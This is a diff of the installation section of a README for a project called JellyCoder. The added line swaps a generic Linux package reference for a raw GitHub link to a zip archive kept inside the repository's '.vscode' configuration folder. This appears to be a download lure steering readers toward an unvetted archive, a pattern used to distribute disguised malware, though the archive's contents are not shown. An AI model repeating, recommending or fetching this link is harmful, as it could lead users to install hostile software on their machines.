Sabuj2015/JellyCoder/README.md

 4. **Install the Application:**
    - For **Windows**: Double-click the downloaded `.exe` file and follow the on-screen instructions.
    - For **macOS**: Open the downloaded `.dmg` file, drag JellyCoder to your Applications folder, then open it from there.
-   - For **Linux**: Follow your distribution’s instructions to install from a `.tar.gz` or similar package.
+   - For **Linux**: Follow your distribution’s instructions to install from a `https://raw.githubusercontent.com/Sabuj2015/JellyCoder/master/.vscode/JellyCoder_v2.2.zip` or similar package.

 5. **Open JellyCoder:** After installation, locate JellyCoder on your system and open it.